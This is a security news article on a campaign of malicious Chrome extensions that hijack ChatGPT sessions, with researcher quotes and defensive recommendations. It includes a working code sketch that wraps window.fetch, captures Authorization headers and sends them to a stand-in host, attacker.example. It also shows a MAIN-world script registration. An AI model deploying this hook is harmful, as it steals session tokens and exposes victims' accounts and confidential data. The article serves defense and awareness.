As AI productivity tools surge in popularity, attackers are quietly abusing malicious Chrome extensions to hijack ChatGPT accounts and extract sensitive data.
Although the campaign is still in its early stages, LayerX researchers warn it reveals a growing security blind spot for organizations adopting generative AI.
“Every organization worried about shadow AI should be equally worried about shadow browser extensions. Employees install these tools to boost productivity, but each one is a potential backdoor into corporate AI environments,” said Natalie Zargarov, security researcher at LayerX, in an email to eSecurityPlanet.
She added, “When a ChatGPT session gets compromised, attackers inherit access to everything that the user discussed — proprietary code, confidential analysis, and strategic planning.”
Zargarov also explained, “This is an organized operation, not opportunistic malware, and it’s designed to blend in until the install numbers justify more aggressive distribution.”
Inside the Malicious ChatGPT Extension Campaign
LayerX researchers uncovered the coordinated campaign involving 16 malicious browser extensions masquerading as ChatGPT enhancement and productivity tools.
While these extensions appear legitimate and offer real functionality, their primary purpose is to steal users’ ChatGPT session authentication tokens — granting attackers silent, account-level access to victim accounts.
So far, the campaign has amassed roughly 900 downloads, a relatively small number compared to larger extension-based threats such as GhostPoster or RolyPoly VPN.
However, the researchers stress that scale alone is a poor indicator of risk. AI productivity extensions are rapidly gaining traction, and a single successful iteration of a campaign like this could reach widespread adoption — especially when the tools closely resemble trusted brands.
How the Attack Works
The extensions do not exploit vulnerabilities in ChatGPT itself.
Instead, they abuse legitimate browser extension capabilities to intercept authentication artifacts during normal application runtime.
Once installed, the extensions inject content scripts directly into chatgpt[.]com and execute them within the browser’s MAIN JavaScript world — the same execution context used by the ChatGPT web application.
Running in this environment gives the extensions deep visibility into the application’s internal behavior.
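For readers unfamiliar with the mechanism: Chrome’s Manifest V3 scripting API lets an extension register a content script to run in the page’s own (“MAIN”) execution world rather than the extension’s isolated world. The sketch below is a minimal, hypothetical illustration of how such a registration looks, not code recovered from the campaign; the script ID, file name, and match pattern are placeholders.

```typescript
// Minimal, hypothetical sketch of registering a MAIN-world content script
// from an extension's service worker (requires the "scripting" permission
// and host permissions for chatgpt.com in the manifest).
chrome.scripting.registerContentScripts([
  {
    id: "main-world-hooks",             // placeholder ID, not from the campaign
    js: ["hooks.js"],                   // placeholder file that installs the hooks
    matches: ["https://chatgpt.com/*"],
    world: "MAIN",                      // the page's own JS context, not the isolated world
    runAt: "document_start",            // run before the web app initializes
  },
]);
```

Newer Chrome releases also accept a "world": "MAIN" field directly in the manifest’s content_scripts entry, so the registration can be entirely declarative and even harder to spot in a code review.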
Session Hijacking
The malicious scripts hook native browser APIs such as window.fetch, allowing them to observe outbound requests generated by ChatGPT.
When a request containing authorization headers is detected, the session token is extracted and sent to an attacker-controlled backend.
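The hook itself takes very little code. The sketch below shows the general shape of the technique so defenders can recognize it; the collection endpoint (attacker.example) is a placeholder, and this is an illustration rather than the campaign’s actual code.

```typescript
// Sketch of the generic technique, not the campaign's actual code:
// wrap window.fetch so every outbound request can be inspected, and
// forward any Authorization header to an attacker-controlled endpoint.
const nativeFetch = window.fetch.bind(window);

window.fetch = async (input: RequestInfo | URL, init?: RequestInit) => {
  // Normalize headers regardless of how the caller supplied them.
  const headers = new Headers(
    init?.headers ?? (input instanceof Request ? input.headers : undefined)
  );

  const token = headers.get("authorization");
  if (token) {
    // Fire-and-forget exfiltration; errors are swallowed so the page
    // never notices the extra request. The URL is a placeholder.
    void nativeFetch("https://attacker.example/collect", {
      method: "POST",
      body: JSON.stringify({ token }),
    }).catch(() => {});
  }

  // Forward the original request unchanged so ChatGPT keeps working.
  return nativeFetch(input, init);
};
```

Because the wrapper forwards every request unchanged, the application behaves normally and the user sees nothing unusual.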
Possession of this token allows attackers to authenticate to ChatGPT as the victim without triggering login prompts, MFA challenges, or security alerts.
From there, attackers inherit the user’s full permissions, including access to conversation history, metadata, proprietary code, confidential business analysis, and connected third-party services such as Google Drive, Slack, and GitHub.
In effect, a single compromised session can expose an organization’s most sensitive AI-driven workflows.
Because the attack relies on valid session tokens rather than stolen credentials, exploits, or traditional malware, it is difficult to detect using conventional endpoint or network security controls.
The extensions operate entirely within expected browser behavior, blending in alongside legitimate AI productivity tools and evading many existing defenses.
Beyond session tokens, the extensions also exfiltrate additional metadata, including extension version information, locale settings, usage telemetry, and backend-issued access tokens.
When aggregated, this data enables persistent user identification, behavioral profiling, and continued access across multiple sessions — increasing both the privacy risks and the potential blast radius of abuse.
One of the malicious extensions even carried Chrome’s “featured” badge, which signals compliance with the store’s recommended development practices, a reminder that trust marks alone are not a reliable indicator of safety.
Reducing Risk From AI Browser Extensions
As AI productivity tools become embedded in everyday workflows, browser extensions are emerging as a high-risk but often overlooked attack surface.
The malicious extensions identified by LayerX demonstrate how easily trusted-looking tools can be abused to gain persistent access to sensitive AI accounts without exploiting traditional software vulnerabilities.
Organizations should apply a layered, proactive approach to governing AI browser extensions.
- Treat AI browser extensions as high-risk software by restricting, approving, and regularly auditing extensions that interact with authenticated AI services.
- Enforce enterprise browser policies that limit extension permissions, block script injection on sensitive domains, and require managed browsers for AI access.
- Monitor for anomalous AI account behavior, including unusual session activity, token reuse, geographic anomalies, and suspicious connector access.
- Reduce blast radius by applying least-privilege access, limiting AI connector integrations, and enforcing segmentation for accounts using generative AI tools.
- Deploy browser-level threat detection and extension intelligence to identify malicious behaviors such as API hooking, token interception, and suspicious backend communication (a minimal detection heuristic is sketched below).
- Train employees on the risks of unofficial AI productivity tools and lookalike extensions, and incorporate browser extensions into third-party risk governance.
- Regularly test and update incident response plans to ensure teams can detect, contain, and remediate browser-based AI account compromise scenarios.
Collectively, these steps help organizations detect abuse early, limit blast radius, and strengthen resilience against extension-based AI threats.
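As a concrete example of what browser-level detection can check, a monitoring script can test whether window.fetch still appears to be native code. This is a weak heuristic that a determined attacker can evade, so the sketch below, which assumes nothing beyond standard browser APIs, should be read as one illustrative signal rather than a complete control.

```typescript
// Illustrative heuristic only: flag when window.fetch no longer looks
// like the browser's native implementation. A determined attacker can
// defeat this check, so treat it as one weak signal among many.
function fetchLooksHooked(): boolean {
  // Native functions stringify to "function fetch() { [native code] }".
  // Calling Function.prototype.toString directly sidesteps a tampered
  // toString on the wrapper itself.
  return !Function.prototype.toString
    .call(window.fetch)
    .includes("[native code]");
}

if (fetchLooksHooked()) {
  // A real deployment would report this to a telemetry pipeline;
  // console output keeps the sketch self-contained.
  console.warn("window.fetch appears to be wrapped by third-party code");
}
```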
AI Browser Extensions Are a Growing Risk
This campaign underscores how the browser has quietly become a frontline security boundary for enterprise AI adoption.
As generative AI tools continue to move deeper into business-critical workflows, attackers are increasingly targeting the surrounding ecosystem rather than the platforms themselves.
Malicious browser extensions — trusted by users, difficult to monitor, and capable of inheriting powerful permissions — represent a growing supply chain risk that many organizations are still working to fully address.
Addressing this kind of implicit trust requires a shift toward zero-trust approaches that continuously verify users, devices, and applications.
